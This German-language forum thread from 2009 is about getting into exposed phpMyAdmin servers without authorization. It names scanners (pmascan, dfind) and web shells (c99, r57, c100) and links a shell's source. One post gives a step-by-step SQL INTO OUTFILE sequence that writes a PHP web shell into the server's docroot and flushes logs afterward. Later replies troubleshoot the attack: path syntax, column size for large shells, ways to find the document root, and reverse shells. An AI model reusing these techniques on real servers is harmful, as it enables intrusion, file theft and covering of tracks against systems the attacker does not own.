Phpmyadmin Datei hochladen; INTO OUTFILE

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von m4st3r, 16. Februar 2009 .

  1. 16. Februar 2009
    Hey Leute Ich hab frühers mal paar Server gehabt und hatte da z.b. phpmyadmin offen dann hatte ich da ne php code hochgeladen das mir nen webinterface gemacht auf das ich mit dem browser zugreifen konnte da konnte ich dann was hochladen und damit hatte ich per ftp root zugriff. Konnte datein downloaden uploaden..
    ist das heute noch möglich????(
    Kann mir da jemand helfen wenn nicht bitte keine dummen kommentare
     
  2. 16. Februar 2009
    AW: Phpmyadmin

    ja is immernoch möglich, google mal nach pmascan oder pmafind und nach c99-shell usw
    scannen kannst das ganze mit dfind mit den parameter "-web 80".

    mfg Radiergimmy
     
  3. 16. Februar 2009
    AW: Phpmyadmin

    das finden hab ich noch drinn
    c99 hab ich auch eine auf festplatte gehabt aber wie lege ich wieder diese an??? das ich auf c99.php zugreifen kann??? oder einen willkürlichen namen?
    thx +bw
     
  4. 17. Februar 2009
    AW: Phpmyadmin

    Code:
    use [B]datenbank[/B]; 
    DROP TABLE IF EXISTS `[B]tabelle[/B]`;
    CREATE TABLE[B] tabelle[/B] (codetab text); 
    INSERT INTO [B]tabelle[/B] (codetab) values ('[B]C99 CODE[/B]'); 
    SELECT * INTO OUTFILE '[B]C:\Pfad\zum\Docroot\c99.php[/B]' FROM[B] tabelle[/B];
    DROP TABLE [B]tabelle[/B]; 
    FLUSH LOGS;
    Zeile 1: Gibt an welche Datenbank verwendet werden soll.

    Zeile 2: Löschte die Tabelle, falls sie vorhanden ist (nur nutzen, wenn du der einzige bist, der diesen Namen verwendet, dass erspart einem die Arbeit jedes mal die Tabelle zu löschen, wenn man sich beim Docroot vertippt hat etc.)

    Zeile 3: Erstellt deine Tabelle und legt den Datentyp fest.

    Zeile 4: Schreibt deinen Code in die Tabelle.

    Zeile 5: Schreibt den Code aus deiner Tabelle in eine Datei.

    Zeile 6: Löscht deine Tabelle wieder.

    Zeile 7: Löscht die MySQL Logs, damit deine Platte nicht so voll wird

    Die Fett gedruckten Sachen sollte man halt anpassen.

    Und kommt mir jetzt nicht mir irgentwelchen 1337 Hacker Tipps wie: "Ey die Shell c99.php zu nennen ist sau dumm". Ich habe das absichtlich sehr allgemein gehalten. Ihr könnt es mir aber gerne mitteilen, wenn ich mich in irgenteinem Punk geirrt habe.
     
  5. 17. Februar 2009
    AW: Phpmyadmin


    ich rate dir folgendes:
    falls du eine shell spawnen willst wie alex quadrat es dir vorschlägt, nimm in zeile fünf anstatt den backslashes die normalen slashes, sonst wirst du auf die fliegen

    Code:
    SELECT * INTO OUTFILE 'C:/Pfad/zum/Docroot/c99.php' FROM tabelle;
    jetzt hab ichs auch dir mitgeteilt alex², dass du dich in irgendeinem punkt geirrt hast (auf wunsch ;D)

    mfg black.
     
  6. 18. Februar 2009
    AW: Phpmyadmin

    Ja, genau so habe ich mir das vorgestellt, ein sinnvoller konstruktiver Post.

    Sinnvolle Ergänzung! Das funktioniert aber auch nicht in allen Fällen.
    Bei von XAMPP unabhänigen PMA's hast du zu 99% Recht. Bei manchen XAMPP Versionen allerdings geht es seltsamer weise nur mit "/" (Das hat zwar nicht direkt etwas mit XAMPP zutun aber du weißt, was ich meine)
    Da ich sehr häufig mit XAMPP zutun habe, nutze ich meistens diese "/", weils bei XAMPP einfach öfter geht. Muss man halt ausprobieren. Erfahrungswerte sind halt nich bei allen gleich.
     
  7. 18. Februar 2009
    AW: Phpmyadmin

    Ich habe auch relativ "viel" mit xampp "zutun", aber mit "\" hat es noch nie, auf anderen servern auf denen kein xampp lief, funktioniert........

    "konstruktiver" post hin oder her, was zählt ist ob es stimmt (bzw helfen kann) oder nicht....
     
  8. 18. Februar 2009
    AW: Phpmyadmin

    Also ich habe definitv schon beides erfolgreich verwendet. Die Diskusion ist auch relativ Sinnlos, da es knapp 10 Sekunden dauert bis man beide Möglichkeiten ausprobiert hat. ^^
     
  9. 18. Februar 2009
    AW: Phpmyadmin

    Axel³, das glaub ich dir nicht, weil es nicht funktionieren kann (internes "Prob")

    b2t:

    1. es funktioniert mit "\\" oder "/"

    2. das use Datenbank; kannst dir sparen, wenn du schreibst:

    DROP TABLE IF EXISTS `datenbank`.`tabelle`;

    so kannst du immer DIREKT auf die Tables zugreifen .... aber das ist geschmackssache

    greez
     
  10. 18. Februar 2009
    AW: Phpmyadmin

    http://privc0de.com/c100.txt

    kann mir da jemand helfen ich bekomme da immer nen fehler (
    oder per pm teile auch die ip des pma srv. mit
    lg
     
  11. 18. Februar 2009
    AW: Phpmyadmin

    //Edit: Scheint wirklich nicht zu gehen. Fragt sich wie ich drauf gekommen bin. Wahrscheinlich, weil ich manchmal "\\" nutze.


    @cable

    Hast du ne ICQ Nummer =) ?
     
  12. 19. Februar 2009
    AW: Phpmyadmin

    Ich weiß zwar nicht, was du genau für einen Error du bekommst, aber es liegt mit sehr hoher Wahrscheinlichkeit daran, dass der Spaltentyp TEXT nur 2^16 + 2 bytes speichern kann. Das sind ca 65.000 Zeichen.

    Die Shell die du uns da gezeigt hast, ist aber ~200.000 Zeichen lang. D.h. du musst als Spaltentyp LONGTEXT nehmen. Dieser kann 2^32 + 2 Byte speichern. Damit kannst du ca. bis zu 4.300.000.000 Zeichen speichern.

    (normalerweise: 1 Zeichen = 1 Byte)

    Andernfalls kannst du auch eine kleinere Shell nehmen und damit deine neue Shell uppen, liegt dann an dir

    greez
     
  13. 19. Februar 2009
    AW: Phpmyadmin

    Jo...wie Cable´chen schon sagte, musste das Format ändern.....

    Aber whatever....
    Was willste den mit so ner großen Shell überhaupt?

    Es langt doch einfach ne One-Zeil-CMD - Shell. wo du deine Befehle eingeben kannst und vllt. noch ne Uploadfunktion hat....(hab ich irgendwo, muss ich mal suchen...poste ich wenn morgen, sofern nicht jemand schneller war)

    Weil es ist ja sonst immer das selbe...

    Echo blabla >>out.txt
    echo blablub >>out.txt

    ist ja immer das selbe und die Befehle solltest du eigtl. schon kennen....is Standart.

    so long
    pampers
     
  14. 19. Februar 2009
    AW: Phpmyadmin

    c99, r57 oder c100 sind durchaus von Vorteil. Manche haben ne FTP Funktion integriert oder nen SafeMode bypass.

    Zudem ist es ähnlich einem "FileBrowser" und "Downloader".

    Auch kann man Mass-Commands schicken und kein dauerndes echo....!

    Also ich bevorzuge manchmal große shells, wegen ihren umfangreichen Funktionen

    greez

    //sry for OffTopic
     
  15. 2. Juli 2009
    AW: Phpmyadmin


    Woher weis man den in Zeile 5 wo die datei hin muss? Die *.php bzw die Daten vom Server könnten ja überall sein.
     
  16. 2. Juli 2009
    AW: Phpmyadmin

    Das kannste über einige php-Dateien rausfinden. Entweder nutzt du die libraries Dateien richtig oder du versuchst es über tbl_replace.php

    Wenn das net geht kannste noch select @@datadir testen dort steht dann nen Pfad den du natürlich noch ans phpmyadmin anpassen musst da dort per mysql pfad steht aber das sollte ja net das Problem sein
     
  17. 2. Juli 2009
    AW: Phpmyadmin

    Das kann bei getrennter Installtation von Apache und MySQL aber zum Problem werden^^.
    Was mann auch nocht machen kann ist, die Datenbanken kurzzeitig umzubennen, so dass die vll vorhandene Homepage nen Error mit dem Pfad ausspuckt (wenns aktivirt ist).
     
  18. 3. Juli 2009
    AW: Phpmyadmin

    Naja aber meistens reicht es schon wenn du weisst es ist c:\ oder d:\ oder halt auch mal k:\ und dann kannste den Rest auch "erraten" ich komme mit dieser Methode eigentlich immer recht gut vorran ausser bei "alten" servern die kennen den Befehl manchmal net aber dann gibt es ja andere Mittel und Wege
     
  19. 3. Juli 2009
    AW: Phpmyadmin

    Erraten ist doch schwul!!
    Bei den neueren Versionen ist es kein Problem an den Pfad zu kommen.
    Bei älteren Version funktionieren scheinbar die herkömmlichen Methoden nicht und deshalb versuch ichs meist mit der rev. shell.

    Im Prinzip musste einfach nur nen Error erzeugen um an das Document Root zu kommen!
    Wie rome schon gesagt hat, musste entweder mit TBL_replace versuchen, was meist nicht mehr funktioniert oder du versuchst es über die libraries!

    Ansonsten versuchs mit der Reverse!

    so long
    pampers

    P.s: Standart Document Root ist im normalfall " C:/xampp/phpmyadmin/ " <-Bei Windows wohl gemerkt!
     
  20. 3. Juli 2009
    AW: Phpmyadmin


    Siehste und wenn du dann was versuchst es geht aber net mit dem Pfad gucke ich schnell bei select @@datadir und wenn ich dort sehe das es D:\ oder K:\ oder sonst was ist ersetze ich C:\ einfach durch das richtige Laufwerk


    die "neueren" Versionen sind im Gegensatz zum Docroot "raten" noch *******r Da gehts ja relativ leicht.

    rev shell wäre auch was bringt aber nichts wenn man net weiss wo winoof liegt schon genug Kisten gehabt wo Windoof auf K:\ oder so lag
     
  21. 3. Juli 2009
    AW: Phpmyadmin

    isses net ..
    Das Doc_root bei nem Win2003 Server ist:
    C:\inetpub\wwwroot\

    Das was du angegeben hast ist nur bei installiertem Xampp....
    Aber es gibt ja auch den Windows httpd, wamp, apache ohne xampp, lighthttpd, easyphp etc pp
     
  22. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.